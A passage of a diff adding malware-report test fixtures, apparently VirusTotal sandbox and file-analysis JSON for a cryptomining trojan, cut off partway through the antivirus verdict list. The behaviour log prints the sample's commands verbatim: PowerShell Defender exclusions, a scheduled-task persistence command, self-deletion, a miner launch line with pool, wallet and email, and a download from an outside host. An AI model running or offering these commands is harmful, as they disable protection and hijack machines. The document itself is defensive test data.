+      "sha256": "5d280a86d5c239f4a2b2f0b64d3c1727ac8f99ed334e01c37eb4fc26fc29396d",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wceq5fru.aql.ps1",
+      "sha256": "115453343e898072f0b6533f3be55b64254b953d0288f2f870baf3d1e0a9266e",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_z2p22j2q.23w.psm1",
+      "sha256": "fa3e0aaca82b873e655bea2ff93cfa6f3a4c6486ab6052c53857876dde72f58e",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\svchost64.exe",
+      "sha256": "b2a887dbada2082a7e0a8bcbf4294a0970ce52eb65e50569b2b0ef413f7f7e58",
+      "type": "PE_EXE"
+    },
+    {
+      "path": "C:\\Windows\\System32\\services64.exe",
+      "sha256": "03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b",
+      "type": "PE_EXE"
+    },
+    {
+      "path": "C:\\Windows\\System32\\services64.exe:Zone.Identifier",
+      "sha256": "255a65d30841ab4082bd9d0eea79d49c5ee88f56136157d8d6156aef11c12309",
+      "type": "TEXT"
+    }
+  ],
+  "command_executions": [
+    "%SAMPLEPATH%",
+    "\"%ComSpec%\" /c %TEMP%\\svchost64.exe \"%SAMPLEPATH%\"",
+    "%TEMP%\\svchost64.exe  \"%SAMPLEPATH%\"",
+    "\"%windir%\\system32\\services64.exe\" ",
+    "\"cmd\" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit",
+    "powershell  -Command Add-MpPreference -ExclusionPath '%TEMP%' ",
+    "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%TEMP%'",
+    "powershell  -Command Add-MpPreference -ExclusionPath '%APPDATA%' ",
+    "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%APPDATA%'",
+    "powershell  -Command Add-MpPreference -ExclusionPath '%HOME%' ",
+    "powershell  -Command Add-MpPreference -ExclusionPath '%windir%' ",
+    "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%windir%'",
+    "\"%ComSpec%\" /c schtasks /create /f /sc onlogon /rl highest /tn \"services64\" /tr '\"%windir%\\system32\\services64.exe\"' & exit",
+    "schtasks  /create /f /sc onlogon /rl highest /tn \"services64\" /tr '\"%windir%\\system32\\services64.exe\"' ",
+    "\"pwsh.exe\" -Command Add-MpPreference -ExclusionPath '%HOME%'",
+    "\"%ComSpec%\" /C choice /C Y /N /D Y /T 3 & Del \"%TEMP%\\svchost64.exe\"",
+    "choice  /C Y /N /D Y /T 3 ",
+    "\"%SAMPLEPATH%\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe\" ",
+    "\"cmd\" /c powershell -Command Add-MpPreference -ExclusionPath '%%UserProfile%%' & powershell -Command Add-MpPreference -ExclusionPath '%%AppData%%' & powershell -Command Add-MpPreference -ExclusionPath '%%Temp%%' & powershell -Command Add-MpPreference -ExclusionPath '%%SystemRoot%%' & exit",
+    "powershell  -Command Add-MpPreference -ExclusionPath '%USERPROFILE% ",
+    "powershell  -Command Add-MpPreference -ExclusionPath '%USERPROFILE%\\AppData\\Roaming' ",
+    "powershell  -Command Add-MpPreference -ExclusionPath '%USERPROFILE%\\AppData\\Local\\Temp' ",
+    "powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Windows' ",
+    "\"C:\\Windows\\System32\\cmd.exe\" /c %USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe \"%SAMPLEPATH%\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe\"",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe  \"%SAMPLEPATH%\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe\"",
+    "\"C:\\Windows\\System32\\cmd.exe\" /c schtasks /create /f /sc onlogon /rl highest /tn \"services64\" /tr '\"C:\\Windows\\system32\\services64.exe\"' & exit",
+    "schtasks  /create /f /sc onlogon /rl highest /tn \"services64\" /tr '\"C:\\Windows\\system32\\services64.exe\"' ",
+    "\"C:\\Windows\\system32\\services64.exe\" ",
+    "\"C:\\Windows\\System32\\cmd.exe\" /C choice /C Y /N /D Y /T 3 & Del \"%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe\"",
+    "choice  /C Y /N /D Y /T 3 ",
+    "\"C:\\Windows\\System32\\cmd.exe\" /c %USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe \"C:\\Windows\\system32\\services64.exe\"",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe  \"C:\\Windows\\system32\\services64.exe\"",
+    "\"C:\\Windows\\system32\\Microsoft\\Libs\\sihost64.exe\" ",
+    "C:\\Windows\\explorer.exe  --cinit-find-x -B --algo=\"rx/0\" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr  --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=432nnXcxVAeRoC4NXAjsEcb2wBfdzJyv4dako7sUvUuN1wtr3t94FD4FJq9qpLRVkfaPEjMYiPnHa85WE38RxaFA8opkGCA.{COMPUTERNAME}/bobisoffline123@gmail.com --pass= --cpu-max-threads-hint=40  --cinit-stealth-targets=\"+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=\"  --tls  --cinit-stealth "
+  ],
+  "verdict_labels": [
+    "NetMiner"
+  ],
+  "http_conversations": [
+    {
+      "url": "https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrig",
+      "request_method": "CONNECT"
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/testdata/vt3_file_1.json b/tests/testdata/vt3_file_1.json
new file mode 100644
index 000000000..03cd61cef
--- /dev/null
+++ b/tests/testdata/vt3_file_1.json
@@ -0,0 +1,967 @@
+{
+    "type": "file",
+    "id": "03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b",
+    "attributes": {
+        "type_description": "Win32 EXE",
+        "tlsh": "T1E013E126FBD9411FE5B94A7850F2A3110F26F666C463C7393CE0079A0E32781F966AB1",
+        "vhash": "044026751\"z",
+        "exiftool": {
+            "UninitializedDataSize": "0",
+            "LinkerVersion": "11.0",
+            "ImageVersion": "0.0",
+            "FileVersionNumber": "0.0.0.0",
+            "LanguageCode": "Neutral",
+            "FileFlagsMask": "0x003f",
+            "ImageFileCharacteristics": "Executable, Large address aware",
+            "CharacterSet": "Unicode",
+            "InitializedDataSize": "1536",
+            "FileTypeExtension": "exe",
+            "OriginalFileName": "itami.exe",
+            "MIMEType": "application/octet-stream",
+            "Subsystem": "Windows GUI",
+            "FileVersion": "0.0.0.0",
+            "TimeStamp": "2021: 09: 29 00: 53: 56+00: 00",
+            "FileType": "Win64 EXE",
+            "PEType": "PE32+",
+            "InternalName": "itami.exe",
+            "SubsystemVersion": "4.0",
+            "ProductVersion": "0.0.0.0",
+            "FileDescription": " ",
+            "OSVersion": "4.0",
+            "FileOS": "Win32",
+            "LegalCopyright": " ",
+            "MachineType": "AMD AMD64",
+            "CodeSize": "41984",
+            "FileSubtype": "0",
+            "ProductVersionNumber": "0.0.0.0",
+            "EntryPoint": "0x0000",
+            "ObjectFileType": "Executable application",
+            "AssemblyVersion": "0.0.0.0"
+        },
+        "trid": [
+            {
+                "file_type": "Win64 Executable (generic)",
+                "probability": 63.5
+            },
+            {
+                "file_type": "OS/2 Executable (generic)",
+                "probability": 12.2
+            },
+            {
+                "file_type": "Generic Win/DOS Executable",
+                "probability": 12.0
+            },
+            {
+                "file_type": "DOS Executable Generic",
+                "probability": 12.0
+            }
+        ],
+        "signature_info": {
+            "copyright": " ",
+            "original name": "itami.exe",
+            "internal name": "itami.exe",
+            "file version": "0.0.0.0",
+            "description": " "
+        },
+        "creation_date": 1632876836,
+        "names": [
+            "itami.exe",
+            "C:\\\\Windows\\\\System32\\\\services64.exe"
+        ],
+        "dot_net_guids": {
+            "typelib_id": "6f05bbb4-1b25-40c8-b685-ed8efc367f8d",
+            "mvid": "2355bcf6-98e6-466e-a443-8a041c7f71e4"
+        },
+        "last_modification_date": 1633796654,
+        "type_tag": "peexe",
+        "capabilities_tags": [],
+        "total_votes": {
+            "harmless": 0,
+            "malicious": 0
+        },
+        "size": 44032,
+        "popular_threat_classification": {
+            "suggested_threat_label": "trojan.msil/tasker",
+            "popular_threat_category": [
+                {
+                    "count": 21,
+                    "value": "trojan"
+                },
+                {
+                    "count": 2,
+                    "value": "dropper"
+                },
+                {
+                    "count": 2,
+                    "value": "worm"
+                }
+            ],
+            "popular_threat_name": [
+                {
+                    "count": 9,
+                    "value": "msil"
+                },
+                {
+                    "count": 4,
+                    "value": "tasker"
+                },
+                {
+                    "count": 3,
+                    "value": "agenttesla"
+                }
+            ]
+        },
+        "authentihash": "c98698aa8994607a00b308097d4af87387031c85c054914bdb24aff60f10806d",
+        "times_submitted": 1,
+        "last_submission_date": 1633178439,
+        "meaningful_name": "itami.exe",
+        "downloadable": true,
+        "sigma_analysis_summary": {
+            "Sigma Integrated Rule Set (GitHub)": {
+                "high": 10,
+                "medium": 1,
+                "critical": 0,
+                "low": 5
+            }
+        },
+        "sandbox_verdicts": {
+            "C2AE": {
+                "category": "malicious",
+                "confidence": 50,
+                "sandbox_name": "C2AE",
+                "malware_classification": [
+                    "MALWARE"
+                ],
+                "malware_names": [
+                    "NetMiner"
+                ]
+            }
+        },
+        "sha256": "03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b",
+        "type_extension": "exe",
+        "tags": [
+            "obfuscated",
+            "peexe",
+            "runtime-modules",
+            "detect-debug-environment",
+            "checks-network-adapters",
+            "calls-wmi",
+            "direct-cpu-clock-access",
+            "64bits",
+            "long-sleeps"
+        ],
+        "last_analysis_date": 1633789226,
+        "unique_sources": 1,
+        "first_submission_date": 1633178439,
+        "sha1": "0c7fc8364e7ead164b5b612982984737fb50fc81",
+        "ssdeep": "768:wqWh3jyYwn3G08QV23J1vZ4qmN9nkmYc+udkVrZPM88yF9gP:wqY+YaGKVUJ5mFyRc+uMi88yF9gP",
+        "packers": {
+            "PEiD": "Microsoft Visual C++ vx.x DLL"
+        },
+        "md5": "b61a4b8883ba9b9d4d85bdaecab71722",
+        "dot_net_assembly": {
+            "assembly_name": "itami.exe",
+            "tables_rows_map_log": "474547544444",
+            "type_definition_list": [
+                {
+                    "type_definitions": [
+                        "Assembly"
+                    ],
+                    "namespace": "System.Reflection"
+                },
+                {
+                    "type_definitions": [
+                        "CompilationRelaxationsAttribute",
+                        "RuntimeCompatibilityAttribute"
+                    ],
+                    "namespace": "System.Runtime.CompilerServices"
+                },
+                {
+                    "type_definitions": [
+                        "ProcessStartInfo",
+                        "ProcessWindowStyle",
+                        "Process"
+                    ],
+                    "namespace": "System.Diagnostics"
+                },
+                {
+                    "type_definitions": [
+                        "Encoding"
+                    ],
+                    "namespace": "System.Text"
+                },
+                {
+                    "type_definitions": [
+                        "Path",
+                        "File",
+                        "MemoryStream",
+                        "Stream"
+                    ],
+                    "namespace": "System.IO"
+                },
+                {
+                    "type_definitions": [
+                        "Thread"
+                    ],
+                    "namespace": "System.Threading"
+                },
+                {
+                    "type_definitions": [
+                        "GuidAttribute"
+                    ],
+                    "namespace": "System.Runtime.InteropServices"
+                },
+                {
+                    "type_definitions": [
+                        "Object",
+                        "Convert",
+                        "String",
+                        "Exception",
+                        "IDisposable"
+                    ],
+                    "namespace": "System"
+                },
+                {
+                    "type_definitions": [
+                        "RijndaelManaged",
+                        "SymmetricAlgorithm",
+                        "CipherMode",
+                        "Rfc2898DeriveBytes",
+                        "DeriveBytes",
+                        "ICryptoTransform",
+                        "CryptoStream",
+                        "CryptoStreamMode"
+                    ],
+                    "namespace": "System.Security.Cryptography"
+                },
+                {
+                    "type_definitions": [
+                        "ResourceManager"
+                    ],
+                    "namespace": "System.Resources"
+                }
+            ],
+            "external_assemblies": {
+                "mscorlib": {
+                    "version": "4.0.0.0"
+                },
+                "System": {
+                    "version": "4.0.0.0"
+                }
+            },
+            "tables_rows_map": "11b20003010270300002000000000100001002000010000",
+            "manifest_resource": [
+                "qccxiuukmhaynaytvbhkedqvlxo.Resources"
+            ],
+            "streams": {
+                "#GUID": {
+                    "chi2": 240.0,
+                    "md5": "5584de2399d0193c73ac0159c5137577",
+                    "entropy": 4.0,
+                    "size": 16
+                },
+                "#Blob": {
+                    "chi2": 3388.339111328125,
+                    "md5": "0fab31fc33cc8cca8bc03e3c30f158c4",
+                    "entropy": 5.014751434326172,
+                    "size": 284
+                },
+                "#US": {
+                    "chi2": 99621.96875,
+                    "md5": "c43964ca31f4677f01fe161feabccc88",
+                    "entropy": 3.905437707901001,
+                    "size": 1548
+                },
+                "#~": {
+                    "chi2": 37778.38671875,
+                    "md5": "ed49a00ac9372d93d6453044e3be11da",
+                    "entropy": 4.106705665588379,
+                    "size": 656
+                },
+                "#Strings": {
+                    "chi2": 12338.865234375,
+                    "md5": "36c893089ff997e8f18ad8d203ca8ef4",
+                    "entropy": 4.86522102355957,
+                    "size": 1072
+                }
+            },
+            "tables_present": 12,
+            "clr_version": "v4.0.30319",
+            "assembly_data": {
+                "majorversion": 0,
+                "minorversion": 0,
+                "hashalgid": 32772,
+                "flags_text": "afPA_None",
+                "buildnumber": 0,
+                "flags": 0,
+                "revisionnumber": 0,
+                "name": "itami"
+            },
+            "tables_present_map": "10908021547L",
+            "clr_meta_version": "1.1"
+        },
+        "pe_info": {
+            "resource_details": [
+                {
+                    "lang": "NEUTRAL",
+                    "entropy": 3.1405982971191406,
+                    "chi2": 49211.953125,
+                    "filetype": "Data",
+                    "sha256": "392438958901b2874207690e26bb6a0499b2c64718031f2e3c4e16887c6b83bc",
+                    "type": "RT_VERSION"
+                },
+                {
+                    "lang": "NEUTRAL",
+                    "entropy": 4.850642204284668,
+                    "chi2": 4374.4306640625,
+                    "filetype": "Data",
+                    "sha256": "df38910bf7c2e3f267c7fbcf0b0a94870ce1c0ce0e20a5c95f99411d2bfd68cc",
+                    "type": "RT_MANIFEST"
+                }
+            ],
+            "resource_types": {
+                "RT_MANIFEST": 1,
+                "RT_VERSION": 1
+            },
+            "timestamp": 1632876836,
+            "resource_langs": {
+                "NEUTRAL": 2
+            },
+            "machine_type": 34404,
+            "sections": [
+                {
+                    "name": ".text",
+                    "chi2": 15650.7,
+                    "virtual_address": 8192,
+                    "flags": "rx",
+                    "raw_size": 41984,
+                    "entropy": 7.9,
+                    "virtual_size": 41960,
+                    "md5": "01f081fa88df2c00856198e96ad9fd2e"
+                },
+                {
+                    "name": ".rsrc",
+                    "chi2": 124043.52,
+                    "virtual_address": 57344,
+                    "flags": "r",
+                    "raw_size": 1536,
+                    "entropy": 3.35,
+                    "virtual_size": 1144,
+                    "md5": "47e05b6ed6a4f5a1937ba6cc424ef251"
+                }
+            ]
+        },
+        "magic": "PE32+ executable for MS Windows (GUI)",
+        "last_analysis_stats": {
+            "harmless": 0,
+            "type-unsupported": 5,
+            "suspicious": 0,
+            "confirmed-timeout": 0,
+            "timeout": 0,
+            "failure": 1,
+            "malicious": 40,
+            "undetected": 28
+        },
+        "last_analysis_results": {
+            "Bkav": {
+                "category": "undetected",
+                "engine_name": "Bkav",
+                "engine_version": "1.3.0.9899",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Lionic": {
+                "category": "malicious",
+                "engine_name": "Lionic",
+                "engine_version": "4.2",
+                "result": "Trojan.MSIL.Tasker.4!c",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Elastic": {
+                "category": "malicious",
+                "engine_name": "Elastic",
+                "engine_version": "4.0.29",
+                "result": "malicious (high confidence)",
+                "method": "blacklist",
+                "engine_update": "20211005"
+            },
+            "MicroWorld-eScan": {
+                "category": "malicious",
+                "engine_name": "MicroWorld-eScan",
+                "engine_version": "14.0.409.0",
+                "result": "Trojan.GenericKD.37706356",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "FireEye": {
+                "category": "malicious",
+                "engine_name": "FireEye",
+                "engine_version": "32.44.1.0",
+                "result": "Generic.mg.b61a4b8883ba9b9d",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "CAT-QuickHeal": {
+                "category": "undetected",
+                "engine_name": "CAT-QuickHeal",
+                "engine_version": "14.00",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "ALYac": {
+                "category": "malicious",
+                "engine_name": "ALYac",
+                "engine_version": "1.1.3.1",
+                "result": "Trojan.GenericKD.37706356",
+                "method": "blacklist",
+                "engine_update": "20211008"
+            },
+            "Cylance": {
+                "category": "malicious",
+                "engine_name": "Cylance",
+                "engine_version": "2.3.1.101",
+                "result": "Unsafe",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "VIPRE": {
+                "category": "undetected",
+                "engine_name": "VIPRE",
+                "engine_version": "96088",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Sangfor": {
+                "category": "malicious",
+                "engine_name": "Sangfor",
+                "engine_version": "2.9.0.0",
+                "result": "Suspicious.Win32.Save.a",
+                "method": "blacklist",
+                "engine_update": "20210930"
+            },
+            "K7AntiVirus": {
+                "category": "malicious",
+                "engine_name": "K7AntiVirus",
+                "engine_version": "11.219.38727",
+                "result": "Trojan ( 0057f9ce1 )",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Alibaba": {
+                "category": "malicious",
+                "engine_name": "Alibaba",
+                "engine_version": "0.3.0.5",
+                "result": "Trojan:MSIL/AgentTesla.36e2de11",
+                "method": "blacklist",
+                "engine_update": "20190527"
+            },
+            "K7GW": {
+                "category": "malicious",
+                "engine_name": "K7GW",
+                "engine_version": "11.219.38726",
+                "result": "Trojan ( 0057f9ce1 )",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Cybereason": {
+                "category": "malicious",
+                "engine_name": "Cybereason",
+                "engine_version": "1.2.449",
+                "result": "malicious.64e7ea",
+                "method": "blacklist",
+                "engine_update": "20210330"
+            },
+            "Baidu": {
+                "category": "undetected",
+                "engine_name": "Baidu",
+                "engine_version": "1.0.0.2",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20190318"
+            },
+            "Cyren": {
+                "category": "malicious",
+                "engine_name": "Cyren",
+                "engine_version": "6.3.0.2",
+                "result": "W64/MSIL_Troj.BCG.gen!Eldorado",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "SymantecMobileInsight": {
+                "category": "type-unsupported",
+                "engine_name": "SymantecMobileInsight",
+                "engine_version": "2.0",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20210126"
+            },
+            "Symantec": {
+                "category": "malicious",
+                "engine_name": "Symantec",
+                "engine_version": "1.15.0.0",
+                "result": "Trojan.Gen.MBT",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "ESET-NOD32": {
+                "category": "malicious",
+                "engine_name": "ESET-NOD32",
+                "engine_version": "24097",
+                "result": "a variant of MSIL/TrojanDropper.Agent.FGN",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "APEX": {
+                "category": "malicious",
+                "engine_name": "APEX",
+                "engine_version": "6.216",
+                "result": "Malicious",
+                "method": "blacklist",
+                "engine_update": "20211007"
+            },
+            "Avast": {
+                "category": "malicious",
+                "engine_name": "Avast",
+                "engine_version": "21.1.5827.0",
+                "result": "Win64:WormX-gen [Wrm]",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "ClamAV": {
+                "category": "undetected",
+                "engine_name": "ClamAV",
+                "engine_version": "0.104.0.0",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Kaspersky": {
+                "category": "malicious",
+                "engine_name": "Kaspersky",
+                "engine_version": "21.0.1.45",
+                "result": "HEUR:Trojan.MSIL.Tasker.gen",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "BitDefender": {
+                "category": "malicious",
+                "engine_name": "BitDefender",
+                "engine_version": "7.2",
+                "result": "Trojan.GenericKD.37706356",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "NANO-Antivirus": {
+                "category": "undetected",
+                "engine_name": "NANO-Antivirus",
+                "engine_version": "1.0.146.25370",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "SUPERAntiSpyware": {
+                "category": "undetected",
+                "engine_name": "SUPERAntiSpyware",
+                "engine_version": "5.6.0.1032",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211002"
+            },
+            "Rising": {
+                "category": "undetected",
+                "engine_name": "Rising",
+                "engine_version": "25.0.0.26",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Ad-Aware": {
+                "category": "malicious",
+                "engine_name": "Ad-Aware",
+                "engine_version": "3.0.21.193",
+                "result": "Trojan.GenericKD.37706356",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Trustlook": {
+                "category": "type-unsupported",
+                "engine_name": "Trustlook",
+                "engine_version": "1.0",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "TACHYON": {
+                "category": "undetected",
+                "engine_name": "TACHYON",
+                "engine_version": "2021-10-09.02",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Sophos": {
+                "category": "malicious",
+                "engine_name": "Sophos",
+                "engine_version": "1.3.0.0",
+                "result": "Mal/Generic-S",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Comodo": {
+                "category": "undetected",
+                "engine_name": "Comodo",
+                "engine_version": "33971",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "F-Secure": {
+                "category": "undetected",
+                "engine_name": "F-Secure",
+                "engine_version": "12.0.86.52",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "DrWeb": {
+                "category": "malicious",
+                "engine_name": "DrWeb",
+                "engine_version": "7.0.49.9080",
+                "result": "Trojan.Siggen15.15776",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Zillya": {
+                "category": "undetected",
+                "engine_name": "Zillya",
+                "engine_version": "2.0.0.4468",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211008"
+            },
+            "TrendMicro": {
+                "category": "undetected",
+                "engine_name": "TrendMicro",
+                "engine_version": "11.0.0.1006",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "McAfee-GW-Edition": {
+                "category": "malicious",
+                "engine_name": "McAfee-GW-Edition",
+                "engine_version": "v2019.1.2+3728",
+                "result": "Dropper-FYI!B61A4B8883BA",
+                "method": "blacklist",
+                "engine_update": "20211008"
+            },
+            "Trapmine": {
+                "category": "type-unsupported",
+                "engine_name": "Trapmine",
+                "engine_version": "3.5.0.1023",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20200727"
+            },
+            "CMC": {
+                "category": "undetected",
+                "engine_name": "CMC",
+                "engine_version": "2.10.2019.1",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211008"
+            },
+            "Emsisoft": {
+                "category": "malicious",
+                "engine_name": "Emsisoft",
+                "engine_version": "2021.5.0.7597",
+                "result": "Trojan.GenericKD.37706356 (B)",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Paloalto": {
+                "category": "malicious",
+                "engine_name": "Paloalto",
+                "engine_version": "1.0",
+                "result": "generic.ml",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "GData": {
+                "category": "malicious",
+                "engine_name": "GData",
+                "engine_version": "A: 25.31005B: 27.24751",
+                "result": "Win64.Trojan.Agent.V0CFNY",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Jiangmin": {
+                "category": "undetected",
+                "engine_name": "Jiangmin",
+                "engine_version": "16.0.100",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211008"
+            },
+            "Webroot": {
+                "category": "undetected",
+                "engine_name": "Webroot",
+                "engine_version": "1.0.0.403",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Avira": {
+                "category": "malicious",
+                "engine_name": "Avira",
+                "engine_version": "8.3.3.12",
+                "result": "HEUR/AGEN.1143065",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Antiy-AVL": {
+                "category": "undetected",
+                "engine_name": "Antiy-AVL",
+                "engine_version": "3.0.0.1",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Kingsoft": {
+                "category": "undetected",
+                "engine_name": "Kingsoft",
+                "engine_version": "2017.9.26.565",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Gridinsoft": {
+                "category": "undetected",
+                "engine_name": "Gridinsoft",
+                "engine_version": "1.0.57.151",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Arcabit": {
+                "category": "malicious",
+                "engine_name": "Arcabit",
+                "engine_version": "1.0.0.886",
+                "result": "Trojan.Generic.D23F5A74",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "ViRobot": {
+                "category": "malicious",
+                "engine_name": "ViRobot",
+                "engine_version": "2014.3.20.0",
+                "result": "Trojan.Win32.Z.Agent.44032.BXD",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "ZoneAlarm": {
+                "category": "undetected",
+                "engine_name": "ZoneAlarm",
+                "engine_version": "1.0",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Avast-Mobile": {
+                "category": "type-unsupported",
+                "engine_name": "Avast-Mobile",
+                "engine_version": "211009-00",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Microsoft": {
+                "category": "malicious",
+                "engine_name": "Microsoft",
+                "engine_version": "1.1.18600.4",
+                "result": "Trojan:MSIL/AgentTesla.CHH!MTB",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Cynet": {
+                "category": "malicious",
+                "engine_name": "Cynet",
+                "engine_version": "4.0.0.27",
+                "result": "Malicious (score: 100)",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "BitDefenderFalx": {
+                "category": "type-unsupported",
+                "engine_name": "BitDefenderFalx",
+                "engine_version": "2.0.936",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20210610"
+            },
+            "AhnLab-V3": {
+                "category": "malicious",
+                "engine_name": "AhnLab-V3",
+                "engine_version": "3.21.1.10219",
+                "result": "Trojan/Win.Generic.C4588584",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Acronis": {
+                "category": "undetected",
+                "engine_name": "Acronis",
+                "engine_version": "1.1.1.82",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20210512"
+            },
+            "McAfee": {
+                "category": "malicious",
+                "engine_name": "McAfee",
+                "engine_version": "6.0.6.653",
+                "result": "AgentTesla-FDCZ!B61A4B8883BA",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "MAX": {
+                "category": "undetected",
+                "engine_name": "MAX",
+                "engine_version": "2019.9.16.1",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "VBA32": {
+                "category": "malicious",
+                "engine_name": "VBA32",
+                "engine_version": "5.0.0",
+                "result": "Trojan.MSIL.Tasker",
+                "method": "blacklist",
+                "engine_update": "20211008"
+            },
+            "Malwarebytes": {
+                "category": "undetected",
+                "engine_name": "Malwarebytes",
+                "engine_version": "4.2.2.27",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Ikarus": {
+                "category": "failure",
+                "engine_name": "Ikarus",
+                "engine_version": "0.1.5.2",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Zoner": {
+                "category": "undetected",
+                "engine_name": "Zoner",
+                "engine_version": "0.0.0.0",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211008"
+            },
+            "TrendMicro-HouseCall": {
+                "category": "malicious",
+                "engine_name": "TrendMicro-HouseCall",
+                "engine_version": "10.0.0.1040",
+                "result": "TROJ_GEN.R002C0DJ221",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Tencent": {
+                "category": "malicious",
+                "engine_name": "Tencent",
+                "engine_version": "1.0.0.1",
+                "result": "Msil.Trojan.Tasker.Pdcc",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Yandex": {
+                "category": "undetected",
+                "engine_name": "Yandex",
+                "engine_version": "5.5.2.24",
+                "result": null,
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "SentinelOne": {
+                "category": "malicious",
+                "engine_name": "SentinelOne",
+                "engine_version": "6.2.0.11",
+                "result": "Static AI - Malicious PE",
+                "method": "blacklist",
+                "engine_update": "20210829"
+            },
+            "eGambit": {
+                "category": "malicious",
+                "engine_name": "eGambit",
+                "engine_version": null,
+                "result": "Unsafe.AI_Score_99%",
+                "method": "blacklist",
+                "engine_update": "20211009"
+            },
+            "Fortinet": {
+                "category": "malicious",
+                "engine_name": "Fortinet",
+                "engine_version": "6.2.142.0",
+                "result": "MSIL/Agent.FGN!tr",
+                "method": "blacklist",
+                "engine_update": "20211009"
